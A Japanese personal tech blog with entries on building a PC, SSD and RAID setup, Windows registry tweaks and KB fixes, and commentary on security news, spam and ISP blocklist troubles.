PC を新調した。 マザー GA-X58A-UD3R http://www.gigabyte.co.jp/Products/Motherboard/Products_Overview.aspx?ProductID=3318&ProductName=GA-X58A-UD3R CPU Intel Core i7 960 @3.2GHz http://www.intel.com/design/i960/ CPUクーラー corsair CWCH50-1 http://www.links.co.jp/items/corsair-others/cwch501.html メモリ SanMAX SMD-2G88N3P-13H http://www.3max.co.jp/products/ddr3.html ビデオカード NVIDIA GeForce GTX285 http://www.nvidia.co.jp/object/product_geforce_gtx_285_jp.html CUDA が使いたくてこれを選択。 インテルか、東芝か――次世代の最新SSDを徹底検証 (1/2) http://plusd.itmedia.co.jp/pcuser/articles/0911/11/news071.html SATA 6Gbpsで世界最速SSD! 「Crucial Real SSD C300」を試す http://journal.mycom.co.jp/articles/2010/03/23/c300/ 【USBメモリー編】放置厳禁!データの“自然蒸発”に要注意 寿命が来なくてもUSBメモリーからデータが消える? http://pc.nikkeibp.co.jp/article/basic/20100513/1024861/ SSDのセキュリティを考える ──保存したデータは安全なのか── http://www.computerworld.jp/topics/storage/191698.html CPU、新旧合わせて45製品をテスト! http://pc.nikkeibp.co.jp/article/special/20100526/1025094/ 6コア効果は抜群! Phenom II X6 1090Tをテスト http://pc.nikkeibp.co.jp/article/news/20100427/1024602/ .NETでマンデルブロ集合を描く(番外編) http://codezine.jp/article/detail/5439 インテルの80GB SSDでストライプ INTEL SSDSA2M080G2GC x2 ウェスタン・デジタル製HDD 1TBでストライプ WDC ED10EARS-00Y5B1 x2 エクスペリエンスインデックス NIC も 100% 出るようで平均 113MB/秒程度。伝送効率100% 以上!? が、ドメインに参加させると速度が半減するみたいで 60% 程度しか出ない。 ↑Kaspersky Internet Security 2010 を入れると、ネットワークの速度が 60% まで落とされる事が判明。 通信する側、される側で NIC の組み合わせによっては、伝送効率10-15% ぐらいになるようで・・・ ドライバを最新の物に入れ替えても LAN の速度が出ない場合は、NIC を違うメーカの物に変えてみるのも手かも。 Microsoft Network Monitor 3.3 http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=983b941d-06cb-4658-b7f6-3088333d062f netsh(1)――ネットワーク設定を切り替える http://itpro.nikkeibp.co.jp/article/COLUMN/20100312/345714/ netsh(2)――通信関連の診断にも使う http://itpro.nikkeibp.co.jp/article/COLUMN/20100312/345720/ ネットワークの帯域幅と接続を監視して調整する http://technet.microsoft.com/ja-jp/windowsserver/ff606462.aspx 3月版 2TBを超えろ! ATAディスクの4Kセクタ問題とは? http://www.atmarkit.co.jp/flinux/rensai/watch2010/watch03a.html 起動プロセスは、大規模なハード ディスクがインストールされているコンピューターでの遅延し、Windows 7 または Windows Server 2008 R2 を実行しています。 http://support.microsoft.com/kb/2505454/ja 2TB以上のドライブはシャドーコピーが動作しない。  新調した所までは良かったが、銀行から引き落としが出来ませんでしたとかで  カードが止まった…  経費で色々買い与えてくれる、素敵な会社はどこかに無いものかね…     年収1000万円サラリーマンが、数万円のキャッシングで「破綻」! ――改正貸金業法で破綻者続出という「逆説」の「ワケ」   http://www.nikkeibp.co.jp/article/sj/20100419/222062/?P=1    第3回 情報発信せよ、技術への投資は惜しむな  http://lab.jibun.atmarkit.co.jp/entries/939   この会社は伸びそうだ。 SSDにデフラグは必要?、インテルの天野氏がSSDユーザー必見のTipsを披露 http://pc.nikkeibp.co.jp/article/news/20100621/1025643/ SSDの劣化状況が確認できるツールが、あるそうで。 http://downloadcenter.intel.com/detail_desc.aspx?agr=y&dwnldid=18455&lang=jpn これか。。。 RAID not supported・・・使えないジャン。 使い込んで半年ぐらい経ったかな? インテルの80GB SSDでストライプ INTEL SSDSA2M080G2GC x2 ウェスタン・デジタル製HDD 1TBでストライプ WDC ED10EARS-00Y5B1 x2 【レポート】信頼性・性能・コスト削減から見た企業のSSD導入を後押しする技術とは? http://journal.mycom.co.jp/articles/2010/08/03/dell/ HDD→SSD交換でパソコン爆速化! http://pc.nikkeibp.co.jp/article/knowhow/20100122/1022363/ SSDで領域分割しても寿命に影響ないの? http://pc.nikkeibp.co.jp/article/knowhow/20100210/1022826/ 最初から SSD を利用していると速くなったかどうかは判らない訳ですが・・・ GPU は RemoteFX の専用ハードウェアが出るまで待ち・・・ 【レポート】ISCA 2010 - IntelがGPUはCPU比で"100倍"速いという説を事実誤認として証明 http://journal.mycom.co.jp/articles/2010/06/30/isca2010_intel/001.html CPUとGPUのいいとこ取りを狙ったGTX 480 http://pc.nikkeibp.co.jp/article/trend/20100619/1025626/ LSIロジック、SSD4台のデモでRAIDボードの速さをアピール http://pc.nikkeibp.co.jp/article/news/20100707/1026009/ RAID基礎辞典 http://www.atmarkit.co.jp/fwin2k/tutor/raiddic/raiddic_01.html 【平澤寿康の周辺機器レビュー】 Crucial 「RealSSD C300」追加検証 〜AMD 890GXの内蔵SATA 6Gbps経由で最も高速に http://pc.watch.impress.co.jp/docs/column/hirasawa/20100414_360937.htmls 【平澤寿康の周辺機器レビュー】 Intel「Intel SSD 320」シリーズ 〜X25-Mの後継モデルとなる第3世代SSD http://pc.watch.impress.co.jp/docs/column/hirasawa/20110412_438904.html Windows 7 deletes all System Restore Points upon reboot(KB2533911) http://support.microsoft.com/kb/2533911/ システムのページングファイルの断片化が激しい場合に、Windows 7 のリブート時に 全ての復元ポイントを消される可能性があるようで・・・  回避するには、一度「ページングファイルなし」に変更し、Pagefile.sys を削除。  最適化の後、「ページングファイルなし」を元に戻す。
最近、サバの起動ドライブの調子が悪い。 色々調査下結果、原因は SATAケーブルの可能性が大。 ケーブルの不調  > 起動ドライブ破壊   > BIOS で起動ドライブの順序が変る    > 起動しないので bootrec /fixmbr で修復     > 起動しない ってトラップに嵌りました・・・ ( BIOS で起動ドライブを変えたら動いた。)  
ドコモのモバイラーズチェック 2012年で終了みたいだけど、チャージしていた回線を解約すると 複数回線を契約していようが、一括請求になっていようが関係なく チャージ分、無かった事にされます・・・ ちょ、DoCoMo さん、それはえげつなくないですか... そんな重要なことを利用規約に書いてないなんて。。。 購入時のペラ紙に書いてありますったて、それでいいんですか?  ドコモ、モバイラーズチェックとモバチェメールを終了  http://k-tai.impress.co.jp/docs/news/20100225_351210.html 上に報告しますって話だったけど、結局消滅しました・・・ 一括請求で引き落としてるんだから、それぐらいプログラムしておけちゅーねん。 携帯2年縛り「解約金不当」京の消費者団体がドコモ、auを提訴印刷用画面を開く http://www.kyoto-np.co.jp/top/article/20100616000167  解約した時に、前払いした料金を消失させる仕組みを問題にしてほしい…  前払いしてるだけなんだから、返せよ… 全国の消費生活センター等 http://www.kokusen.go.jp/map/ 悪徳商法相談事例 http://www.shousen.org/akutoku/index.html ドコモに限らず先払いのチャージシステムを導入している企業は全部胡散臭い可能性が・・・ 利用する場合は、ちゃんと保障されているのか念入りに確認した方がよいです。
WHDC の新しいホワイト ペーパーとツール http://www.microsoft.com/japan/whdc/connect/usb/Event-Tracing.mspx
アドビ、「iPhone」用「Flash」の開発を中止 http://japan.cnet.com/news/ent/story/0,2000056022,20412536,00.htm  HTML5 になれば、64bit版 の IE でいい気がする。  他社のブラウザーは x64版、出すつもりあるのかな・・・ [動画]アップル iPad、早くも車載仕様!? http://response.jp/article/2010/04/06/138792.html  取り外し可能にして、ソニーかシャープさん、作ってくれませんかね、ドコモで・・・  今の携帯は GPS も TV も付いてるし。。。セパレードがいいかな。  電気自動車が主流になって、色々なメーカーが参入してこれば、期待できるのかな。
リファラーの URL  大量の bot マシンが特定の Web サイトにアクセスしたとして、そのリファラーが  全部、同じ URL だった場合、管理者はその URL に接続したくなっちゃうんだろうか?  まず、検索エンジンで調べてから・・・が、無難なのかな。  URL の最後に広告書いて GET や POST するとか、、、404 出るだろうけど関係なくログに残すと。。。  メールに比べると目にする絶対数が違いすぎるだろうけど、システム管理者を狙った場合には有効か?  アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起  https://www.jpcert.or.jp/at/2010/at100028.txt  URL を隠蔽出来る短縮サービスを使ってくる手口が増えましたね・・・  ご用心を。
Processor-Specific Graphics Pipeline (PSGP) の設定を変更   HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D   値の名前 : PSGPNumThreads   データ型 : REG_DWORD   値 : 論理 CPU 数 (16 以下の数値)   無効にする場合   値の名前 : DisablePSGP   データ型 : REG_DWORD   値 : 1 Windows Server 2008、Windows Server 2008 R2 または Windows 7 で論理プロセッサが 17 個以上ある場合、 Windows Media Player (WMP) でメディア ファイルを再生した後に WMP を終了すると異常終了する http://support.microsoft.com/kb/982640 構成 17 個以上の論理プロセッサを搭載するコンピューターで DirectX 9. 0 アプリケーションがクラッシュします。 http://support.microsoft.com/kb/982485
図書館HPにアクセス3万3千回 業務妨害容疑で男逮捕 http://www.asahi.com/digital/internet/NGY201005250031.html >1秒に1回程度の速度でアクセスを繰り返せるプログラムを作っていたという。 はい? これぐらい捌けないシステムって、どうよ? そっちの方が問題だと思うが・・・ 図書館Webサイトへのクローラを実行して逮捕された男性、不起訴に http://slashdot.jp/security/article.pl?sid=10/06/21/118216 20日間拘留… 万引きした場合でも10日の拘留から延長され、一度捕まると 20日出れない仕組みにされているようで・・・(三食昼寝付きで20日) @任意の取調べでは被疑者自身が自己防衛で録音できるそうです。 図書館長「了解求めないアクセスが問題」 HP閲覧不能 http://www.asahi.com/national/update/0821/NGY201008210009.html まてまて、そんなこと言い出したらメールマガジンとかも送れなくなるんじゃねーか? セッション数の問題なら、同時接続数を減らすとか対策できるだろうに。 どう考えても不具合でしょう。 今の一般的なサーバーの性能が PS2 だったとして、ファミコンで動かしてたんでしょ・・・ IT 世代から取り残されてますね、考え方も何もかも。。。  図書館HP閲覧不能、サイバー攻撃の容疑者逮捕、だが…  http://www.asahi.com/digital/internet/NGY201008200021.html  セッションを正しく終了しないバグが残ってたみたいだし、応答が無くなる問題が発生した時点で  使用できるポートの数を増やす、TIME_WAIT 状態で待機する時間を短くする等、色々対策出来るだろうに・・・ 岡崎市立図書館は相手が国外だったらどうするつもりだったのだろうか http://web-tan.forum.impressrd.jp/e/2010/08/24/8655 三菱図書館システムMELIL旧型の欠陥、アニメ化 - 岡崎図書館事件(7) http://takagi-hiromitsu.jp/diary/20100829.html#SlideFrame_1 Microsoft.comは毎秒7000〜9000回の攻撃を受けている http://slashdot.jp/security/article.pl?sid=10/08/31/1136257 岡崎市立中央図書館のホームページへの大量アクセスによる障害について http://www.library.okazaki.aichi.jp/tosho/about/files/20100901.html 秒間 1 回のアクセスが大量ですか・・・  10 年前ならそれで通用したかもしれませんけど、「思慮が浅い人」って烙印押しましたね。 岡崎市立図書館事件に見るネットと法執行機関のズレ http://pc.nikkeibp.co.jp/article/column/20100901/1027224/
Windows7 のログオン画面の変更。  Windows 7のログオン画面を簡単に変更「Change LogonScreen for Windows 7」  http://www.forest.impress.co.jp/docs/review/20100524_369143.html   キー: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background   値の名前 : OEMBackground   データ型 : REG_DWORD   値 : 1   イメージファイルの場所   C:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg     これは Windows Server 2008 R2 でもいけそうな感じですね。  複数のマシンを管理している人には良いかも。    Windows 7対応無償カスタマイズツール「Ultimate Windows Tweaker 2.0」  http://journal.mycom.co.jp/news/2009/07/16/030/index.html
アマゾン クラウド を使ったアマゾンに偽装したスパム。 これ日本語だと、だまされる人多そう。 タイミングよく本物のアマゾンからのメールの前後にでも届いたら・・・(実際、そういうタイミングだった。) 偽の注文に見立ててるから注意。 必ず HTML メールで送ってくるだろうから、送信元が digital-no-reply@amazon.com で HTML な物はブロックした方がよさげ。 ヘッダに X-AMAZON-CLIENT-HOST てなのが入るからこれで判定しても良いかも。
9415/TCPに対するアクセスの増加について [PDF: 約49KB] http://docs.google.com/viewer?url=http://www.npa.go.jp/cyberpolice/detect/pdf/20100615.pdf CN 経由でソースポートが 6000 な物は、TCP/1433, TCP/2967, TCP/135 も来ますね… TCP/2967 はシマンテック製品狙い、TCP/1433 は SQL Server 狙いですか。 シマンテックのアンチウイルスは、本体のアップデートがされませんから古いまま利用しているサーバーを狙い撃ち。 また相手が Windows かの探りも兼ねて、認証が必要なサービスに Administrator でピッキング仕掛けるって感じでしょうか。 Windows 2008 Server でも 外部 IP からの TCP/135 は ESTABLISHED になってますねぇ・・・はて? こういうのは、イメージ的にゾンビ物に似てますね。 噛まれるとゾンビになって襲ってくる訳で、、、いつまでもバリケードだけで防げるのか・・・ 本人はゾンビになっている事すら気付いてない訳だけど、こういう状況で自分の身を守るにはどうする?
コマンドプロンプトからの 3 文字以上の拡張子の取り扱い。  キーは残ってるみたいだけど、Windows 7 でも起こるのかな?  [NT] コマンド プロンプトでの拡張子の取り扱い  http://support.microsoft.com/kb/164351/ja   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem   値の名前 : Win95TruncatedExtensions   データ型 : REG_DWORD   値 : 0 デフォルト値 = 1
共有ファイルの同期保持をしない。(VISTA以降)   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\LanmanWorkstation\Parameters   値の名前 : FileInfoCacheLifetime   データ型 : REG_DWORD   値 : 0 (数値を入れた場合は、タイムアウトまでの秒)   データ破損の問題が発生した場合、複数のユーザーが読み取りを実行し、書き込み操作を SMB2 環境で共有ファイル   http://support.microsoft.com/kb/2028965/ja
何かが足りない日本のIT教育政策 http://www.atmarkit.co.jp/im/cits/serial/murphy/28/01.html  会社はIT技術者の初任給を上げよ、今の社員はITの使い方が下手だから若手に期待、、、てことか?  代表の考え方が変らない限り、インフラにかける予算はない=初任給は低いまま、でしょうねぇ。  まともに使えている中小企業は少ないですしね、、、  効率悪すぎって事も、何が不自由か理解してない訳だから、根本的に駄目駄目デス。  今、学生に教える必要があるのは、仮想化技術でしょうね、あと携帯の使い方・・・  今の携帯の使われ方は酷すぎますね。不用意にリンク踏みまくりで、危機感なさすぎ。  子供にパンドラの箱を与えて、管理できてない状態が続いている。。。  そんなんだと、PC 利用時にウイルスに感染しまくりじゃないかと、、、終わってますね。
ドコモ、スマートフォン向けISP「spモード」概要を発表 http://internet.watch.impress.co.jp/docs/news/20100713_380385.html  勝手コンテンツ製作者は、これでソースが表示されるようになるリスクが一つ増えますね。  携帯サイトは、まともに作成されてない物が多いので、ひどい状況になりそう。。。  最近のドコモの携帯はクッキーが利用出来るようになりましたが、携帯の固有IDと紐付けした  サイトの場合は、なりすましによる情報の漏洩やフィッシングなどが増えそうですね・・・  クッキーが使えることによる、犯罪も増えてくるでしょうね・・・ リンクをを踏ませて  固有IDを抜いてクッキーを書き込む、、、メールアドレスまで知られてたら餌食ですね。  スマートフォンを使ってパケットキャプチャとかもいけるのかな?  パケットを覗かれる可能性があると、IDとパスワード認証によるサイトで SSL を使っていない  場合は、注意しないといけませんね。あと、スパムの発射装置・・・
DLL 検索パス アルゴリズムを制御   WebDAV 共有からの DLL の読み込みを無効にする   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager   値の名前 : CWDIllegalInDllSearch   データ型 : REG_DWORD   値 : 1   特定のアプリケーションに対して共有からの DLL の読み込みを無効にする   キー: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<application binary name>   値の名前 : CWDIllegalInDllSearch   データ型 : REG_DWORD   値 : 2    0xFFFFFFFF 既定の DLL 検索順から現在の作業ディレクトリを削除する    0      既定の検索順    1      現在の作業ディレクトリが WebDAV フォルダーに設定されている場合、現在の作業ディレクトリからの DLL 読み込みをブロックする    2      現在の作業ディレクトリがリモート フォルダーに設定されている場合、現在の作業ディレクトリからの DLL 読み込みをブロックする    キーなし  既定の検索順    その他の値 既定の検索順   LoadLibrary 関数と LoadLibraryEx 関数のDLL検索順   1.アプリケーションが読み込まれたディレクトリ   2.システム ディレクトリ   3.16 ビット システム ディレクトリ   4.Windows ディレクトリ   5.現在の作業ディレクトリ (CWD)   6.PATH 環境変数に設定されているディレクトリ   DLL 検索パス アルゴリズムを制御する新しい CWDIllegalInDllSearch レジストリ エントリについて   http://support.microsoft.com/kb/2264107/   Windowsに致命的なセキュリティ問題、40のアプリ影響   http://journal.mycom.co.jp/news/2010/08/20/056/      WebDAV クライアントの無効化、アウトバウンドの139/445ポートをブロックすること。   アドバイサリ出ました。    マイクロソフト セキュリティ アドバイザリ (2269637) 安全でないライブラリのロードにより、リモートでコードが実行される    http://www.microsoft.com/japan/technet/security/advisory/2269637.mspx    DLL プリロード攻撃を防止するためのライブラリの安全な読み込み    http://support.microsoft.com/kb/2389418  レッツ! Windows 7 - ランタイムライブラリ編  http://journal.mycom.co.jp/articles/2010/10/25/w7II/index.html
Diagnostic Service Host サービスを、次のエラーが原因で開始できませんでした: サービスが適切に機能するために必要な特権が、サービス アカウント構成に存在しません。 サービス Microsoft 管理コンソール (MMC) スナップイン (services.msc) と ローカル セキュリティ設定 MMC スナップイン (secpol.msc) を使って、 サービス構成とアカウント構成を表示することができます。 ログの名前: System ソース: Service Control Manager イベント ID:7000 レベル: エラー  ドメインに参加させている Windows7 のログを見たら大量に吐き出してた・・・    サービス開始時のエラー メッセージ "イベント ID : 7000" または "イベント ID : 7013"  http://support.microsoft.com/kb/314357/ja  んー、改善されない、、、どうしたもんか。  ハングした時に何か壊れたかな?(マシンを再起動させたら吐かなくなった。24時間起動させたままってのが問題だったのか・・・)  別件で  コントロール パネル\ネットワークとインターネット\ネットワークと共有センター\共有の詳細設定  に、ファイル共有の接続で、128Bit暗号化を使うように変更。
mixi大規模障害について http://alpha.mixi.co.jp/blog/?p=2109 > 現状判明しているのは以下の点です > *memcachedに大量の接続・切断を行うとmemcachedプロセスが突然終了することがある > *memcachedには異常時に終了するフローもあるが、同時に出力されるはずのエラーログは出ていなかった > *coreも出力されていなかった > 障害時の memcachedのバージョンは1.4.4, libeventのバージョンは1.3bです ******************************************************************************** Memcached て? ******************************************************************************** memcachedの活用と運用 実践編 第1回 memcachedの起動オプションを把握しよう http://gihyo.jp/dev/feature/01/memcached_advanced/0001 > memcachedは,高性能な分散メモリキャッシュサーバです。 > データベースへの問い合わせ結果を一時的にmemcachedへ > キャッシュすることで,データベースへのアクセス回数を > 減らし,動的なWebアプリケーションの高速化やスケーラ > ビリティの向上を実現できます。 ******************************************************************************** 検証 ******************************************************************************** memcachedos.plというのを書いた http://subtech.g.hatena.ne.jp/mala/20100817/1282049428 > わかったこと > memcached1.4.5+libevent1.4.7 on CentOS 4.6 → 落とせた > memcached1.4.4+libevent1.4.9 on CentOS 5.4 → 落とせた > memcached1.2.6 → 落とせなかった > 落ちるときには [err] event_queue_remove: 0x8ab54e0(fd 26) not on queue 8 といったログを吐く。 > libeventのバージョンが古いとエラーログでないらしい。 > 最初サーバーとクライアントを別ホストでやってたけど1台だけでも再現できた。 > デフォルト設定(-c 1024)では1プロセスでも落とせた。 > memcached -c 15000 などして最大接続数を引き上げた場合は、落とせなくなった。 > 接続数が足りなくなるように複数プロセス立ち上げれば落とせた。 > 不安要素は「ただの高負荷時」でも落ちるのかどうか?なのだけど、最大接続数が > 足りているのであれば恐らく落ちない。今のところ再現できない。 > 自社サービスで問題が起きうるかどうか > → 問題起きないバージョン使ってる or デフォルト設定で接続数足りてるか、 > 足りないサービスについては-cが大きな数値に増やしてあった。 mixi大規模障害について その2 http://alpha.mixi.co.jp/blog/?p=2153 つまり、ルーターで外からのパケットをフィルタして接続要求したら落ちると、そういうことですかね?
Windows 7/Server 2008 R2のWindowsエクスプローラに[検索コネクタ]を追加する http://www.atmarkit.co.jp/fwin2k/win2ktips/1345searchfd/searchfd.html  そのうち試して見よう・・・ 第1回 ビジュアル効果やサムネイル表示を無効にする http://pc.nikkeibp.co.jp/article/knowhow/20100826/1027143/
まじですか・・・ テスト用にフォルダを作成して、ブラウザーを使ってページを表示したら 2秒後に google のクローラーが見に来た・・・ ちょ、どうなんてんの? ブラウザーにツールバーとか入れてないし、URL が google に漏れることは無いと思うんですが... うかうか、テストページも作れねぇジャン。(当然、前日まではアクセスの形跡はなし) google様のなすがままですか、そうですか・・・
顧客のサーバにパッチを適用する際のベストプラクティス http://japan.zdnet.com/sp/report/story/0,2000056431,20421519,00.htm インシデントは起きるという前提での準備はできていますか? http://pc.nikkeibp.co.jp/article/column/20101018/1028008/ 第1回 ここまで分かる! ログの神髄 http://www.atmarkit.co.jp/fsecurity/rensai/log01/log01.html Anytime Upgrade機能を無効にし、不用意なアップグレードを避ける http://journal.mycom.co.jp/column/windows/094/index.html Microsoft Security Essentialsの更新タイミングを変更する http://journal.mycom.co.jp/column/windows/093/index.html
キネクトが即効ハックされ「空間キャプチャー」「物体認識」など様々な技術デモ動画が公開 http://blog.esuteru.com/archives/1633328.html  キネクトは、XBOX360 で発売された周辺機器。  ハックされてドライバがリリースされた事により、既存のモニターが非接触タッチパネルになる可能性が出てきましたね…  楽しそうです。  コードが公開されたKinectにハッキングの秀作が続々登場  http://jp.techcrunch.com/archives/20101207videos-the-best-kinect-hacks-and-mods-one-month-in/ OpenNI Tips http://nma.web.nitech.ac.jp/fukushima/openni/openni.html Microsoft、KinectのWindowsアプリを開発できるSDKをこの春リリースへ http://www.itmedia.co.jp/enterprise/articles/1102/22/news023.html 「Kinect for Windows」のSDK公開--MSが探るビジネス機会 http://japan.cnet.com/news/commentary/35001775/
2010.11.17 逆引きできないアドレスから30分に1回程度で巡回されている方がいらっしゃるようですが・・・ そんなに、リアルタイム性を求める様な内容は書いてないですよ(笑)
Windows Key の無効・有効化   Windows Key の無効化   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout   値の名前 : Scancode Map   データ型 : REG_BINARY   値 : 00000000000000000300000000005BE000005CE000000000   有効にする場合は、値を削除する   http://support.microsoft.com/kb/216893
ディスクのドライブ番号 SATA または RAID の複数のディスクを搭載するコンピューターで、Windows Vista、Windows Server 2008、Windows Server 2008 R2 または Windows 7 を設定すると、SATA チャネル番号が期待どおりに対応していません。 http://support.microsoft.com/kb/937251/ja Windows Server 2008 R2 での不十分なディスク I/O のパフォーマンスのトラブルシューティングを行うには、Storport.sys ドライバーのログ機能を向上するのには、修正プログラムを追加します。 http://support.microsoft.com/kb/978000/ja  eSATA で DISK を 10 台付けた 2008 R2 で 5台毎に ソフトウェア RAID5 を構成して  運用していると 1 ヶ月以上経ってから調子が悪くなったのはこれが原因か・・・
Windows Server 2008 R2 または Windows 7 での共有ファイルにアクセスすると"0x00000044"の停止エラー http://support.microsoft.com/kb/2549724/ja 大容量 SATA ハード ディスクを搭載したコンピューターを再開しようとすると、さまざまな Stop エラー メッセージでは、Windows 7 または Windows Server 2008 R2 で受信します。 http://support.microsoft.com/kb/977178/ja 1 人のユーザーは、Windows 7 または Windows Server 2008 R2 を実行しているコンピューターで SMB のバージョン 2 を使用して複数のコンピューターで開いている共有ファイルが更新されるときのデータの破損 http://support.microsoft.com/kb/2618096/ja  これは適用しておいた方が良さそうだ・・・   SMB2の無効化   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters   値の名前 : SMB2   データ型 : REG_DWORD   値 : 0
SMB2 でのファイルキャッシュを 無効化   SMB2 でのファイルキャッシュを 無効化   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters   値の名前 : FileInfoCacheLifetime   データ型 : REG_DWORD   値 : 0   値の名前 : FileNotFoundCacheLifetime   データ型 : REG_DWORD   値 : 0   値の名前 : DirectoryCacheLifetime   データ型 : REG_DWORD   値 : 0   SMB2 通信を利用してファイルが正しく参照できないことがある   http://support.microsoft.com/kb/2537777   Windows 7 または Windows サーバー 2008 R2 では、ファイルが削除された場合に SMB2 ディレクトリ キャッシュが正しく更新されません。   http://support.microsoft.com/kb/2646563   ファイル サービス テクノロジでは、Windows Server 2008 と Windows Server 2008 R2 では現在利用可能な修正の一覧   http://support.microsoft.com/kb/2473205
マイクロソフト セキュリティ アドバイザリ: TrueType フォント解析の脆弱性により、特権が昇格される http://support.microsoft.com/kb/2639658/ja  Windows XP で、この Fix it を有効にすると Office 2010 の Word から PDF の作成が出来なくなります。  また、KB972270、KB982132 が毎回出てくるようです。  ご注意を。。。
DoubleClick Ad Planner https://www.google.com/adplanner/ このサイトのユーザー情報は こんな感じ 極端ですね…  女子に効くのは「ネット広告」、男子に効くのは「SEO」 【広告の有無によるネット通販売上比較】 (1/1):MarkeZine(マーケジン)  http://markezine.jp/article/detail/14764 と言うことは、家電 か PC間連 張っておけって事ですな。
USB 記憶装置の最大転送サイズを大きくする  http://support.microsoft.com/kb/2581464/ja  からパッチをゲット。     USB 記憶装置の最大転送サイズを大きくする   キー: HKLM\SYSTEM\CurrentControlSet\Control\usbstor\VVVVPPPP   値の名前 : MaximumTransferLength   データ型 : REG_DWORD   値 : 65535 (64 KB) 〜 2097120 (2 MB)         ※VVVV は、16 進数のデバイス記述子 idVendor です。          PPPP は、16 進数のデバイス記述子 idProduct です。          デバイスマネージャで該当するドライバのプロパティから詳細タブを開いてハードウェアIDを見ればいけるでしょう。
「ターゲットはAKB、ジャニーズ系掲示板」 サイト攻撃用ウイルス作成容疑で中2ら摘発 京都府警 - MSN産経ニュース http://sankei.jp.msn.com/affairs/news/120704/crm12070422150020-n1.htm  ブラクラ程度で捕まえますか・・・  そのうち PC に繋いであるキーボードに F5 がある人は全員逮捕されますね。  マスコミは掲示板に残っていたであろう脆弱性を指摘するべき。  日本を狙った標的型攻撃が増えているのに、こんなことで捕まえていたら…
シャープ株価下落、時価総額がグリーを下回る - ITmedia ニュース http://www.itmedia.co.jp/news/articles/1207/24/news045.html なんと・・・ X68000開発メンバーにスマホを作らせてください。
Facebook スパム Web に晒しているアドレス宛に届くようになった。 アドレスを収集してスパムまがいな事をやっているのだろうか・・・ だれだよ、、、
スタートメニューのドラッグ アンド ドロップ操作を無効にする   スタートメニューのドラッグ アンド ドロップ操作を無効   キー: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前 : NoChangeStartMenu   データ型 : REG_DWORD   値 : 1   Windows 7 の SP1、または Windows Server 2008 R2 の SP1 では、レジストリ キーを構成することによってスタート メニューのドラッグ アンド ドロップ操作を無効にすることはできません。   http://support.microsoft.com/kb/2754035/ja?sd=rss&spid=14134
Sony の BRAVIA 買って1年たってないのに、このありさま。 朝一でTVの電源入れると、、、 5分程経つと変なマスクみたいなものは除去されますが なんという、嫌がらせ。 Sonyの人いわく、故障じゃないらしく、2〜3日で直るそうで。。。 意味が分かりません。 あれから2週間程経ちますが、なおってませんね・・・ どうも、この障害は全国規模で起きていたそうで、液晶パネルの故障とかなんとか。。。 リコール物だと思うのですが・・・ で、在庫が枯渇してもう作ってないから、新しい別商品に「修理」と言う名の交換だそうで。 ちなみに、くっつけてたHDDの中身は全部駄目だそうです。 新品交換してもらったにもかかわらず、1年持たずにまた壊れた・・・ 液晶に十字の線が。。。 なにこの故障率の高さ。 こんな物作りしてりゃ海外で売れないわさ。
IPv6 を完全に無効化   IPv6 を完全に無効化する   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters   値の名前 : DisabledComponents   データ型 : REG_DWORD   値 : ffffffff   ※設定後は再起動が必要。   Windows Vista、Windows 7、および Windows Server 2008 で特定の IPv6 (Internet Protocol version 6) を無効にする方法   http://support.microsoft.com/kb/929852/ja
Windows Live Mail  Gmail も拾っていたのだけど、ある日突然メールを開こうとすると、OS(Windows7)が落ちるように・・・  そして、何度も繰り返したら、Gmail のアカウントが消滅していた・・・  はて、、、  Live Mail 絡みで OS を落とされるのはこれで2回目。。。
暴徒がPCを攻撃 - フォーティネット http://www.fortinet.co.jp/security_blog/130206-mob-attacks-pc.html  Android の中身を抜くアプリが増えているみたいですねー  フェイスブックや、ドロップボックスの設定を全公開とかに  書き換えるような物もそのうち出てくるのでしょうかね。
ネット回線を隼に変更して、固定IPをグリーンネットにしました。 が、、、 > 550 5.7.1 Service unavailable; Client host [115.187.66.170] blocked using Spamhaus Blocklist, mail from IP banned; To request removal from this list see http://www.spamhaus.org/query/bl?ip=115.187.66.170 . スパムデータベースに登録されてて、メールのやりとに支障が。 精度が悪いことで有名な所を利用している企業のIT技術者がダメダメなんだろう。 どうやら数年前の情報を使い続けており使用者情報が古いままのようです。 解除してもらうように連絡していますが、一向に改善される見込みが無いです。 スパマーが運用しているグリーンネットを使っているからだ、とか返信が・・・ プロバイダを変更してIPアドレスが変わったから、、、なのか? Google セーフ ブラウジング診断ページ: www.netdive.jp http://www.google.com/safebrowsing/diagnostic?site=http://www.netdive.jp 最近、ブロックされているサイトが多発していますね・・・ クロームからフラッシュがデフォルトで無効化されたし、スーパークッキーをウイルス扱いするようになったのかも。 ちなみにクロームでフラッシュを有効に戻すには、アドレスバーに chrome://plugins/ と入力。 2015.4.2 現在 icloud.com 宛てへのメールが届かなく調べたら、これが原因でした・・・ 5年以上経過しても DB の更新がされません。 こんな信頼性の低い所を使っている Apple もやっている事が手抜きですね。(知識の乏しい下請けの仕業だとは思いますが) Spamhaus は迷惑メールを送るよりもさらに迷惑な行為を行っています。 ブラックリストの定義に、ここを使わないように注意しましょう。。。
